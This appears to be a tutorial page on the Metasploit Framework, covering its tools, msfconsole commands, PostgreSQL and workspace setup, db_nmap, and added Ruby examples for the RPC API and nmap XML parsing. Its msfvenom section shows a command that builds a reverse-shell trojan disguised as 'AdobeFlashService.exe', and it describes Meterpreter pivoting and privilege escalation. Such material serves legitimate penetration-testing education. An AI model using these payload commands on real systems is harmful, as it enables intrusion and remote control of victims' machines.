Metasploit Framework

🔍 Introduction

Metasploit is the best-known penetration testing framework: it covers most of the technical side of a pentest, from recon and scanning to exploitation. It was originally developed by H.D. Moore and is now maintained by Rapid7.

Perl -> Ruby: the framework started life as a Perl tool and was rewritten in Ruby for version 3, which is why modules, plugins and the RPC client library are all Ruby today.

It is particularly strong at network-based testing, and because it ships with modules for publicly disclosed vulnerabilities and exploit code, it is used well beyond classic pentesting: for testing an organisation's own security posture, and in bug bounty work.

Installation

On macOS and Linux it can be installed with a one-line script. Windows needs a separate installer, so refer to the installation documentation. The script below executes code fetched over the network with the privileges of the invoking user, so read it before running it.

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

Structure of Tools

Besides msfconsole, the command most people know, the Metasploit framework ships with several other tools.

Name        Type    Description
----        ----    -----------
msfconsole  CLI     Metasploit's interactive console. Most of the work is done here.
msfd        Daemon  Metasploit daemon: exposes a msfconsole over a plain TCP socket (default localhost:55554) with no authentication, so keep it bound to localhost.
msfdb       CLI     Initializes and manages the PostgreSQL database Metasploit uses (msfdb init / start / stop / status / reinit).
msfrpc      CLI     RPC client for talking to a running msfrpcd.
msfrpcd     Daemon  Starts the RPC server (MessagePack over HTTP, TLS and port 55553 by default). Any language can drive Metasploit through it; the msfrpc-client gem is the Ruby client for it.
msfupdate   CLI     Updates the framework.
msfvenom    CLI     Payload generator: one command produces a binary or source file that runs the shellcode/payload you choose.
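To show what "using Metasploit over RPC" actually means on the wire, here is an added example (not code from this page, from Rapid7, or from the msfrpc-client gem): msfrpcd accepts an HTTP POST whose body is a MessagePack array of the form [method, token, args...], and answers with a MessagePack map. The encoder/decoder below implements just the MessagePack subset the API uses, so the script runs with the standard library alone. It assumes a lab server started as `msfrpcd -U msf -P <password> -S -a 127.0.0.1` (-S disables TLS; against the default TLS listener use an https:// endpoint and trust the server certificate rather than disabling verification); the endpoint URL, the msf user, the MSF_RPC_PASS variable and the function names are this example's own assumptions.

```ruby
require 'net/http'
require 'uri'
require 'stringio'

# Minimal MessagePack subset (nil, bool, int, str, bin, array, map): enough for
# the shapes msfrpcd exchanges. Added example; msfrpcd itself uses the msgpack gem.
def pack(obj)
  out = ''.b
  case obj
  when nil   then out << "\xC0".b
  when true  then out << "\xC3".b
  when false then out << "\xC2".b
  when Integer
    raise ArgumentError, "unsupported int #{obj}" unless obj.between?(-32, 0xFFFF_FFFF)
    if    obj < 0       then out << [obj & 0xFF].pack('C')          # negative fixint
    elsif obj < 0x80    then out << [obj].pack('C')                 # positive fixint
    elsif obj < 0x100   then out << "\xCC".b << [obj].pack('C')     # uint8
    elsif obj < 0x10000 then out << "\xCD".b << [obj].pack('n')     # uint16
    else                     out << "\xCE".b << [obj].pack('N')     # uint32
    end
  when String
    b = obj.b
    if    b.bytesize < 32      then out << [0xA0 | b.bytesize].pack('C')      # fixstr
    elsif b.bytesize < 0x100   then out << "\xD9".b << [b.bytesize].pack('C') # str8
    elsif b.bytesize < 0x10000 then out << "\xDA".b << [b.bytesize].pack('n') # str16
    else                            out << "\xDB".b << [b.bytesize].pack('N') # str32
    end
    out << b
  when Array
    out << (obj.size < 16 ? [0x90 | obj.size].pack('C') : "\xDC".b + [obj.size].pack('n'))
    obj.each { |e| out << pack(e) }
  when Hash
    out << (obj.size < 16 ? [0x80 | obj.size].pack('C') : "\xDE".b + [obj.size].pack('n'))
    obj.each { |k, v| out << pack(k) << pack(v) }
  else raise ArgumentError, "cannot pack #{obj.class}"
  end
  out
end

def unpack(bytes)
  read_value(StringIO.new(bytes.b))
end

def read_value(io)
  b = io.getbyte or raise 'truncated msgpack data'
  case b
  when 0x00..0x7F then b                                   # positive fixint
  when 0x80..0x8F then read_map(io, b & 0x0F)              # fixmap
  when 0x90..0x9F then read_array(io, b & 0x0F)            # fixarray
  when 0xA0..0xBF then read_str(io, b & 0x1F)              # fixstr
  when 0xC0 then nil
  when 0xC2 then false
  when 0xC3 then true
  when 0xC4 then read_str(io, io.getbyte)                  # bin8 (raw session output)
  when 0xC5 then read_str(io, io.read(2).unpack1('n'))     # bin16
  when 0xCC then io.getbyte
  when 0xCD then io.read(2).unpack1('n')
  when 0xCE then io.read(4).unpack1('N')
  when 0xD9 then read_str(io, io.getbyte)
  when 0xDA then read_str(io, io.read(2).unpack1('n'))
  when 0xDB then read_str(io, io.read(4).unpack1('N'))
  when 0xDC then read_array(io, io.read(2).unpack1('n'))
  when 0xDE then read_map(io, io.read(2).unpack1('n'))
  when 0xE0..0xFF then b - 0x100                           # negative fixint
  else raise "unsupported msgpack type byte 0x#{b.to_s(16)}"
  end
end

def read_str(io, n)
  s = io.read(n)
  raise 'truncated string' unless s && s.bytesize == n
  s.force_encoding(Encoding::UTF_8)
end

def read_array(io, n)
  Array.new(n) { read_value(io) }
end

def read_map(io, n)
  n.times.each_with_object({}) { |_, h| h[read_value(io)] = read_value(io) }
end

# One RPC round trip. msfrpcd reports RPC-level errors as a map carrying
# "error" => true, delivered with HTTP 401/403/500, so those bodies are decoded too.
def rpc_post(endpoint, message)
  uri = URI(endpoint)
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = (uri.scheme == 'https')
  req = Net::HTTP::Post.new(uri.request_uri)
  req['Content-Type'] = 'binary/message-pack'
  req.body = pack(message)
  res = http.request(req)
  raise "unexpected HTTP #{res.code} from msfrpcd" unless %w[200 401 403 500].include?(res.code)
  unpack(res.body)
end

class MsfRpc
  # auth.login is the only call made without a token; the token it returns is a
  # bearer credential for every later call, so treat it like the password.
  def initialize(endpoint, user, pass)
    @endpoint = endpoint
    r = rpc_post(@endpoint, ['auth.login', user, pass])
    raise "login failed: #{r.inspect}" unless r['result'] == 'success'
    @token = r['token']
  end

  def call(method, *args)                      # => [method, token, *args]
    r = rpc_post(@endpoint, [method, @token, *args])
    raise "#{method}: #{r['error_message']}" if r.is_a?(Hash) && r['error']
    r
  end
end

# Usage against the assumed lab server (msfrpcd -U msf -P "$MSF_RPC_PASS" -S -a 127.0.0.1):
if __FILE__ == $PROGRAM_NAME && ENV['MSF_RPC_PASS']
  rpc = MsfRpc.new('http://127.0.0.1:55553/api/', 'msf', ENV['MSF_RPC_PASS'])
  p rpc.call('core.version')                          # framework, Ruby and API versions
  p rpc.call('module.exploits')['modules'].size       # number of loaded exploit modules
end
```

Everything a client can do through this interface (launching modules, reading session output) is only as protected as the msfrpcd password and the token, which is why the daemon should stay on localhost or behind TLS with a strong -P value.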

MSFConsole

Usage

<Command> [ARG1 ARG2 ARG3 ...]

Core

?             Help menu
banner        Display an awesome metasploit banner
cd            Change the current working directory
color         Toggle color
connect       Communicate with a host
debug         Display information useful for debugging
exit          Exit the console
features      Display the list of not yet released features that can be opted in to
get           Gets the value of a context-specific variable
getg          Gets the value of a global variable
grep          Grep the output of another command
help          Help menu
history       Show command history
load          Load a framework plugin
quit          Exit the console
repeat        Repeat a list of commands
route         Route traffic through a session
save          Saves the active datastores
sessions      Dump session listings and display information about sessions
set           Sets a context-specific variable to a value
setg          Sets a global variable to a value
sleep         Do nothing for the specified number of seconds
spool         Write console output into a file as well the screen
threads       View and manipulate background threads
tips          Show a list of useful productivity tips
unload        Unload a framework plugin
unset         Unsets one or more context-specific variables
unsetg        Unsets one or more global variables
version       Show the framework and console library version numbers

Use Modules

advanced      Displays advanced options for one or more modules
back          Move back from the current context
clearm        Clear the module stack
favorite      Add module(s) to the list of favorite modules
info          Displays information about one or more modules
listm         List the module stack
loadpath      Searches for and loads modules from a path
options       Displays global options or for one or more modules
popm          Pops the latest module off the stack and makes it active
previous      Sets the previously loaded module as the current module
pushm         Pushes the active or list of modules onto the module stack
reload_all    Reloads all modules from all defined module paths
search        Searches module names and descriptions
show          Displays modules of a given type, or all modules
use           Interact with a module by name or search term/index

With Database

db_connect        Connect to an existing data service
db_disconnect     Disconnect from the current data service
db_export         Export a file containing the contents of the database
db_import         Import a scan result file (filetype will be auto-detected)
db_nmap           Executes nmap and records the output automatically
db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
db_remove         Remove the saved data service entry
db_save           Save the current data service connection as the default to reconnect on startup
db_status         Show the current data service status

Metasploit stores hosts, services, credentials, loot and so on in PostgreSQL, and that is the only database backend current versions support (the MySQL and SQLite options of old releases are gone). The one alternative is a remote data service, which msfconsole reaches over HTTP(S) with db_connect, but that service is itself backed by PostgreSQL.

Set-up Postgres

First switch to the postgres system account, then create a dedicated role for Metasploit with createuser (-P prompts for its password).

su - postgres
createuser msfuser -P

Then create the database and make that role its owner.

createdb --owner=msfuser hahwul_database

MSF Connect to DB

msf6 > db_connect msfuser:yourpassword@127.0.0.1:5432/hahwul_database
[*] Rebuilding the module cache in the background...

msf6 > db_status
[*] Connected to msf. Connection type: postgresql.

Once connected, the db_* commands and the workspace commands become available. Note that a db_connect typed this way leaves the database password in the console history (~/.msf4/history); the database.yml approach below avoids that.

Automated connect

You can put the connection settings in a database.yml so they are loaded automatically when msfconsole starts. msfconsole looks for ~/.msf4/database.yml first and then config/database.yml under the framework's install directory (the latter is what msfdb init writes); the MSF_DATABASE_CONFIG environment variable overrides both. The file holds the database password in clear text, so keep it readable by your user only (mode 0600). msfconsole reads the production section, so the file needs one; the pgsql anchor lets it reuse the development settings instead of repeating them:

development: &pgsql
  adapter: postgresql
  database: hahwul_database   # the database created above
  username: msfuser           # the role created in postgres above
  password: yourpassword      # that role's password
  host: localhost
  port: 5432                  # change if your PostgreSQL listens elsewhere
  pool: 5
  timeout: 5

production: &production
  <<: *pgsql
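The three steps above (create the role and database, connect once by hand, then persist the settings) end in a file that Rails-style YAML loading has to resolve correctly, and that file is a credential. The added example below (not code from this page or from Metasploit) writes a database.yml in that shape, creates it owner-only, and loads it back with aliases and the merge key resolved so you can confirm the production section really carries the credentials before msfconsole relies on it. It uses the role and database names from this page; the function names and the temporary directory are assumptions of the example.

```ruby
require 'yaml'
require 'fileutils'
require 'tmpdir'

# Single-quote a scalar so passwords containing ':' '#' or quotes survive YAML parsing.
def yaml_scalar(value)
  "'#{value.to_s.gsub("'", "''")}'"
end

# The database.yml msfconsole loads, in the layout msfdb init writes. Added example;
# the defaults are the values used on this page.
def database_yml(database:, username:, password:, host: 'localhost', port: 5432)
  <<~YAML
    development: &pgsql
      adapter: postgresql
      database: #{yaml_scalar(database)}
      username: #{yaml_scalar(username)}
      password: #{yaml_scalar(password)}
      host: #{yaml_scalar(host)}
      port: #{Integer(port)}
      pool: 5
      timeout: 5

    # msfconsole reads the production section; the merge key reuses the
    # development settings instead of duplicating the credentials.
    production: &production
      <<: *pgsql
  YAML
end

# Create the file owner-only (0600): it carries the PostgreSQL password in clear.
def write_database_yml(path, **opts)
  FileUtils.mkdir_p(File.dirname(path))
  File.open(path, File::WRONLY | File::CREAT | File::TRUNC, 0o600) do |f|
    f.write(database_yml(**opts))
  end
  File.chmod(0o600, path)   # also tighten a pre-existing, looser file
  path
end

# Load it the way the framework will: aliases must be allowed and the <<: merge
# must resolve, otherwise production ends up with no adapter or credentials.
def load_database_yml(path)
  cfg = YAML.safe_load(File.read(path), aliases: true)
  prod = cfg.fetch('production')
  %w[adapter database username password host port].each do |key|
    raise "production.#{key} missing after alias merge" unless prod.key?(key)
  end
  prod
end

def permissions_ok?(path)
  (File.stat(path).mode & 0o077).zero?   # no group/other bits at all
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |dir|
    path = write_database_yml(File.join(dir, '.msf4', 'database.yml'),
                              database: 'hahwul_database', username: 'msfuser',
                              password: 'yourpassword')
    puts File.read(path)
    p load_database_yml(path), permissions_ok?(path)
  end
end
```

Point the path at ~/.msf4/database.yml for real use; msfconsole will then report the connection in db_status without any password on the command line.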

Workspace

Basic

Show list

msf6 > workspace
* default

Add

msf6 > workspace -a target
[*] Added workspace: target
[*] Workspace: target
msf6 > workspace
  default
* target

Hosts

hosts lists the hosts recorded in the current workspace. Entries get there either by hand with hosts -a or through the db_* commands described below.

msf6 > hosts

Hosts
=====

address    mac  name       os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----       -------  ---------  -----  -------  ----  --------
127.0.0.1       localhost  Unknown                    device

msf6 > hosts -a 192.168.0.24
[*] Time: 2022-06-19 14:10:32 UTC Host: host=192.168.0.24

Services

services lists the services accumulated in the workspace. They can be added manually with the services command, or by any command that records port and service data, db_nmap being the usual one.

msf6 > services
Services
========

host       port  proto  name             state  info
----       ----  -----  ----             -----  ----
127.0.0.1  22    tcp    ssh              open
127.0.0.1  5000  tcp    upnp             open
127.0.0.1  7000  tcp    afs3-fileserver  open
127.0.0.1  8080  tcp    http-proxy       open

db_* Commands

Commands prefixed with db_ write their results into the database. The most used is db_nmap: it runs nmap with an XML output file and imports that file, so scanning with db_nmap instead of plain nmap leaves the discovered hosts and services in the current workspace, as below. (-PN is the older spelling of -Pn, skip host discovery; nmap still accepts it.)

msf6 > db_nmap -PN 192.168.0.4
...snip..

msf6 > services
Services
========

host         port  proto  name             state  info
----         ----  -----  ----             -----  ----
192.168.0.4  22    tcp    ssh              open
192.168.0.4  5000  tcp    upnp             open
192.168.0.4  7000  tcp    afs3-fileserver  open
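Because db_nmap (and db_import, which accepts nmap's -oX output directly) work from the XML, the rows in hosts and services are exactly what the importer extracts from it. The added example below is not Metasploit's importer; it is a small Ruby parser that pulls the same host/port/proto/name/state/info columns out of nmap XML and renders them in the services layout, which is handy for checking a scan offline before importing it into a workspace. The XML is constructed for the example (not a real scan) and the function names are assumptions.

```ruby
require 'rexml/document'

# Constructed sample (not a real scan): what `nmap -oX - -Pn 192.168.0.4` emits,
# trimmed to the elements the importer reads.
SAMPLE_NMAP_XML = <<~XML
  <?xml version="1.0"?>
  <nmaprun scanner="nmap" args="nmap -oX - -Pn 192.168.0.4">
    <host>
      <status state="up"/>
      <address addr="192.168.0.4" addrtype="ipv4"/>
      <address addr="AA:BB:CC:DD:EE:FF" addrtype="mac"/>
      <hostnames><hostname name="target.lan" type="PTR"/></hostnames>
      <ports>
        <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
        <port protocol="tcp" portid="5000"><state state="open"/><service name="upnp"/></port>
        <port protocol="tcp" portid="7000"><state state="open"/><service name="afs3-fileserver"/></port>
        <port protocol="tcp" portid="8080"><state state="closed"/><service name="http-proxy"/></port>
      </ports>
    </host>
    <host>
      <status state="down"/>
      <address addr="192.168.0.5" addrtype="ipv4"/>
    </host>
  </nmaprun>
XML

Service = Struct.new(:host, :port, :proto, :name, :state, :info)

def attr_of(element, name)
  element ? element.attributes[name] : nil
end

# One row per <port>, keyed by the host's IPv4 address: the columns the services
# table shows. A host that is down has no <ports> element and yields nothing.
def parse_nmap_services(xml)
  rows = []
  REXML::Document.new(xml).elements.each('nmaprun/host') do |host|
    ip = attr_of(REXML::XPath.first(host, 'address[@addrtype="ipv4"]'), 'addr')
    next unless ip
    host.elements.each('ports/port') do |port|
      svc = port.elements['service']
      info = [attr_of(svc, 'product'), attr_of(svc, 'version')].compact.join(' ')
      rows << Service.new(ip, port.attributes['portid'].to_i, port.attributes['protocol'],
                          attr_of(svc, 'name'), attr_of(port.elements['state'], 'state'), info)
    end
  end
  rows
end

# The importer records closed/filtered ports as well; most workflows want open only.
def open_services(rows)
  rows.select { |r| r.state == 'open' }
end

# Renders rows in the layout of msfconsole's `services` output.
def services_table(rows)
  cols = Service.members.map(&:to_s)
  widths = cols.map { |c| [c.size, *rows.map { |r| r[c].to_s.size }].max }
  fmt = ->(vals) { vals.each_with_index.map { |v, i| v.to_s.ljust(widths[i]) }.join('  ').rstrip }
  [fmt.call(cols), fmt.call(cols.map { |c| '-' * c.size })]
    .concat(rows.map { |r| fmt.call(r.to_a) }).join("\n")
end

if __FILE__ == $PROGRAM_NAME
  rows = parse_nmap_services(SAMPLE_NMAP_XML)
  puts services_table(open_services(rows))
end
```

Run it against a real `nmap -oX scan.xml` file to preview what db_import scan.xml will add, and remember that a workspace is a database of your targets' attack surface: export it with db_export only to places you would trust with the scan data itself.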

MSFVenom

msfvenom is the CLI tool for generating payloads: standalone code that carries a Meterpreter stager or a plain shell, emitted in many languages and output formats. It pairs directly with msfconsole, where exploit/multi/handler with the same payload, LHOST and LPORT catches the connection.

msfvenom -x app.exe \
-p windows/shell/reverse_tcp \
-e x86/shikata_ga_nai -k -f exe \
-i 25 LHOST=xxx.xxx.xxx.xxx LPORT=4444 > AdobeFlashService.exe

In the command above, -x app.exe uses an existing executable as the template and -k keeps its original behaviour, -p picks the payload, -e and -i apply the encoder for 25 iterations, -f exe sets the output format, and LHOST/LPORT point at the listener. Encoding is a bad-character workaround, not antivirus evasion: shikata_ga_nai output is heavily signatured and the stager is detected regardless of the iteration count. Output formats go well beyond exe, py and sh (apk, elf, macho, war, psh and more), so payloads for most operating systems can be produced; msfvenom -l formats and msfvenom -l payloads list what is available.

Meterpreter

Meterpreter is the post-exploitation shell that ships with Metasploit; compared with a system shell such as bash or sh it has far more of what an operator needs built in. It runs in memory (the stager loads it rather than writing it to disk), which historically helped against antivirus; the stock Meterpreter is well known to current EDR, so do not count on that. Its built-in commands collect information from the host, run local exploit modules for privilege escalation, and pivot: with route, traffic from other modules is sent through the session to reach hosts on internal segments, so you move laterally and gradually take over the environment.

Customize

🕹 Tools

📚 Articles

As with ZAP, I have written quite a few posts about Metasploit; see the page below.

https://www.hahwul.com/categories/metasploit/

📌 References

Licensed under CC BY-NC-SA 4.0